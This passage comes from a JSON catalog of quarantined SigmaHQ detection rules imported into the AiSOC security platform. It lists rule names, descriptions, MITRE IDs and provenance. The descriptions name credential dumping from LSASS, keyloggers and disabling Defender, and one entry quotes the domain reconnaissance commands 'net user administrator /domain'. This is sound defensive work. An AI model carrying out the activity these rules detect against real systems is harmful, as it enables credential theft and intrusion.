"path": "detections/sigma-imports/_quarantine/service-registry-permissions-weakness-check.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95afc12e-3cbb-40c3-9340-84a032e596a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" } }, { "id": "sigmahq-sigma-95d61234-7f56-465c-6f2d-b562c6fedbc4", "type": "detection", "name": "Linux Package Uninstall", "description": "Detects linux package removal using builtin tools such as \"yum\", \"apt\", \"apt-get\" or \"dpkg\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-package-uninstall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95d61234-7f56-465c-6f2d-b562c6fedbc4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_remove_package.yml" } }, { "id": "sigmahq-sigma-95e60a2b-4705-444b-b7da-ba0ea81a3ee2", "type": "detection", "name": "Remote Access Tool - Simple Help Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-simple-help-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95e60a2b-4705-444b-b7da-ba0ea81a3ee2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_simple_help.yml" } }, { "id": "sigmahq-sigma-95eadcb2-92e4-4ed1-9031-92547773a6db", "type": "detection", "name": "Suspicious PowerShell Invocation From Script Engines", "description": "Detects suspicious powershell invocations from interpreters or unusual programs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-invocation-from-script-engines.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95eadcb2-92e4-4ed1-9031-92547773a6db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_script_engine_parent.yml" } }, { "id": "sigmahq-sigma-95f0643a-ed40-467c-806b-aac9542ec5ab", "type": "detection", "name": "Suspicious Get Information for SMB Share", "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-information-for-smb-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95f0643a-ed40-467c-806b-aac9542ec5ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" } }, { "id": "sigmahq-sigma-96036718-71cc-4027-a538-d1587e0006a7", "type": "detection", "name": "Windows Processes Suspicious Parent Directory", "description": "Detect suspicious parent processes of well-known Windows processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-processes-suspicious-parent-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "96036718-71cc-4027-a538-d1587e0006a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml" } }, { "id": "sigmahq-sigma-961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "type": "detection", "name": "HackTool - Credential Dumping Tools Named Pipe Created", "description": "Detects well-known credential dumping tools execution via specific named pipe creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1003.002", "T1003.004", "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-credential-dumping-tools-named-pipe-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml" } }, { "id": "sigmahq-sigma-961e0abb-1b1e-4c84-a453-aafe56ad0d34", "type": "detection", "name": "Execution via stordiag.exe", "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-via-stordiag-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml" } }, { "id": "sigmahq-sigma-961e33d1-4f86-4fcf-80ab-930a708b2f82", "type": "detection", "name": "Potential Persistence Via Excel Add-in - Registry", "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-excel-add-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_xll.yml" } }, { "id": "sigmahq-sigma-962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "type": "detection", "name": "LSASS Access From Non System Account", "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-access-from-non-system-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" } }, { "id": "sigmahq-sigma-9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "type": "detection", "name": "Suspicious File Characteristics Due to Missing Fields", "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-characteristics-due-to-missing-fields.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" } }, { "id": "sigmahq-sigma-965e2db9-eddb-4cf6-a986-7a967df651e4", "type": "detection", "name": "Potential Keylogger Activity", "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1056.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-keylogger-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "965e2db9-eddb-4cf6-a986-7a967df651e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" } }, { "id": "sigmahq-sigma-966315ef-c5e1-4767-ba25-fce9c8de3660", "type": "detection", "name": "Suspicious Environment Variable Has Been Registered", "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-environment-variable-has-been-registered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "966315ef-c5e1-4767-ba25-fce9c8de3660", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml" } }, { "id": "sigmahq-sigma-968eef52-9cff-4454-8992-1e74b9cbad6c", "type": "detection", "name": "Reconnaissance Activity", "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.002", "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/reconnaissance-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "968eef52-9cff-4454-8992-1e74b9cbad6c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" } }, { "id": "sigmahq-sigma-9691f58d-92c1-4416-8bf3-2edd753ec9cf", "type": "detection", "name": "ESXi Admin Permission Assigned To Account Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"system\" and \"permission\" flags in order to assign admin permissions to an account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.012", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-admin-permission-assigned-to-account-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9691f58d-92c1-4416-8bf3-2edd753ec9cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml" } }, { "id": "sigmahq-sigma-969c7590-8c19-4797-8c1b-23155de6e7ac", "type": "detection", "name": "Okta Identity Provider Created", "description": "Detects when a new identity provider is created for Okta.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-identity-provider-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "969c7590-8c19-4797-8c1b-23155de6e7ac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_identity_provider_created.yml" } }, { "id": "sigmahq-sigma-96b9f619-aa91-478f-bacb-c3e50f8df575", "type": "detection", "name": "Remote PowerShell Session (PS Module)", "description": "Detects remote PowerShell sessions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-powershell-session-ps-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "96b9f619-aa91-478f-bacb-c3e50f8df575", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" } }, { "id": "sigmahq-sigma-96c982fe-3d08-4df4-bed2-eb14e02f21c8", "type": "detection", "name": "Get-ADUser Enumeration Using UserAccountControl Flags", "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/get-aduser-enumeration-using-useraccountcontrol-flags.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" } }, { "id": "sigmahq-sigma-96cd126d-f970-49c4-848a-da3a09f55c55", "type": "detection", "name": "Potential PowerShell Obfuscation Using Alias Cmdlets", "description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-obfuscation-using-alias-cmdlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "96cd126d-f970-49c4-848a-da3a09f55c55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_set_alias.yml" } }, { "id": "sigmahq-sigma-96f697b0-b499-4e5d-9908-a67bec11cdb6", "type": "detection", "name": "Removal of Potential COM Hijacking Registry Keys", "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/removal-of-potential-com-hijacking-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" } }, { "id": "sigmahq-sigma-970007b7-ce32-49d0-a4a4-fbef016950bd", "type": "detection", "name": "Potential Configuration And Service Reconnaissance Via Reg.EXE", "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012", "T1007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-configuration-and-service-reconnaissance-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "970007b7-ce32-49d0-a4a4-fbef016950bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_query_registry.yml" } }, { "id": "sigmahq-sigma-9703792d-fd9a-456d-a672-ff92efe4806a", "type": "detection", "name": "Backup Catalog Deleted", "description": "Detects backup catalog deletions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/backup-catalog-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9703792d-fd9a-456d-a672-ff92efe4806a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml" } }, { "id": "sigmahq-sigma-9705a6a1-6db6-4a16-a987-15b7151e299b", "type": "detection", "name": "Cisco Discovery", "description": "Find information about network devices that is not stored in config files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083", "T1201", "T1057", "T1018", "T1082", "T1016", "T1049", "T1033", "T1124" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9705a6a1-6db6-4a16-a987-15b7151e299b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_discovery.yml" } }, { "id": "sigmahq-sigma-970823b7-273b-460a-8afc-3a6811998529", "type": "detection", "name": "Uncommon One Time Only Scheduled Task At 00:00", "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-one-time-only-scheduled-task-at-00-00.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "970823b7-273b-460a-8afc-3a6811998529", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml" } }, { "id": "sigmahq-sigma-9711de76-5d4f-4c50-a94f-21e4e8f8384d", "type": "detection", "name": "Installation of TeamViewer Desktop", "description": "TeamViewer_Desktop.exe is create during install", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/installation-of-teamviewer-desktop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" } }, { "id": "sigmahq-sigma-9719a8aa-401c-41af-8108-ced7ec9cd75c", "type": "detection", "name": "Windows Defender Definition Files Removed", "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-definition-files-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" } }, { "id": "sigmahq-sigma-973ef012-8f1a-4c40-93b4-7e659a5cd17f", "type": "detection", "name": "Periodic Backup For System Registry Hives Enabled", "description": "Detects the enabling of the \"EnablePeriodicBackup\" registry value. Once enabled, The OS will backup System registry hives on restarts to the \"C:\\Windows\\System32\\config\\RegBack\" folder. Windows creates a \"RegIdleBackup\" task to manage subsequent backups.\nRegistry backup was a default behavior on Windows and was disabled as of \"Windows 10, version 1803\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/periodic-backup-for-system-registry-hives-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "973ef012-8f1a-4c40-93b4-7e659a5cd17f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_enable_periodic_backup.yml" } }, { "id": "sigmahq-sigma-974515da-6cc5-4c95-ae65-f97f9150ec7f", "type": "detection", "name": "Disable Microsoft Defender Firewall via Registry", "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-microsoft-defender-firewall-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" } }, { "id": "sigmahq-sigma-974be8d2-283e-4033-ab08-7505b84204d0", "type": "detection", "name": "OpenCanary - Host Port Scan (SYN Scan)", "description": "Detects instances where an OpenCanary node has been targeted by a SYN port scan.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-host-port-scan-syn-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "974be8d2-283e-4033-ab08-7505b84204d0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_portscan_syn_scan.yml" } }, { "id": "sigmahq-sigma-975b2262-9a49-439d-92a6-0709cccdf0b2", "type": "detection", "name": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-appx-installation-attempt-using-add-appxpackage-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "975b2262-9a49-439d-92a6-0709cccdf0b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml" } }, { "id": "sigmahq-sigma-97661d9d-2beb-4630-b423-68985291a8af", "type": "detection", "name": "Potential RCE Exploitation Attempt In NodeJS", "description": "Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rce-exploitation-attempt-in-nodejs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97661d9d-2beb-4630-b423-68985291a8af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/nodejs/nodejs_rce_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-976d6e6f-a04b-4900-9713-0134a353e38b", 